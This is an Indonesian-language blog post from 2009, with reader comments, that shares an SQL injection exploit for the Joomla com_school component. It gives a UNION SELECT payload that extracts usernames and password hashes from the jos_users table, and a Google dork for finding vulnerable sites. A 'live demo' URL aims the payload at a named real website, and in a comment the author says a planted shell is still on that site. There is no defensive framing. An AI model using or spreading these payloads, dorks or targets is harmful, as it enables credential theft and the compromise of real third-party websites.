Joomla Component com_school sqLi Bug

Written on June 12, 2009 – 2:44 am | by Bilal Vr Vicryansyah

Joomla sebuah cms opensource yang populer seringkali menjadi pilihan kita untuk membuat sebuah website dengan waktu singkat tapi dibalik kemudahan joomla menyimpan bug yang lumayan serius. walaupun joomla merupakan project komunitas yang selalu diupdate jika terdapat bug tapi bagaimana dengan modul dan plugin yang kita pakai yup component dan module lah yg menjadi mimpi buruk nya.

Joomla Component com_school sqLi Bug (milworm source)

http://localHost/path/index.php?option=com_school&Itemid=null&func=showclass&classid=<sql Code>

Sqli syntax (kalo table prefixnya default yaitu jos_ )

-null'+union+select+concat(username,0x3a,password)ChipD3Bi0s,null+from+jos_users/*

Google Dork

inurl:"com_school&Itemid="

Live Demo

http://www.mariadecervello.com/index.php?option=com_school&Itemid=null&func=showclass&classid=-null’+union+select+concat(username,0×3a,password)ChipD3Bi0s,null+from+jos_users/*

2 Responses to “Joomla Component com_school sqLi Bug”
By Joy on Jun 16, 2009 | Reply

nice2

live demo linknya udah ke patch ya bro..

thanks anyway.. share more and more… hehe….
By Vicry Lagi Pusing on Jun 16, 2009 | Reply

weleh2 ia uda di patch tapi shell nya masi blom di copot

vicry@wordpress

Joomla Component com_school sqLi Bug

2 Responses to “Joomla Component com_school sqLi Bug”

Post a Comment

Pages

Archives

Categories

Recent Comments

Recent Post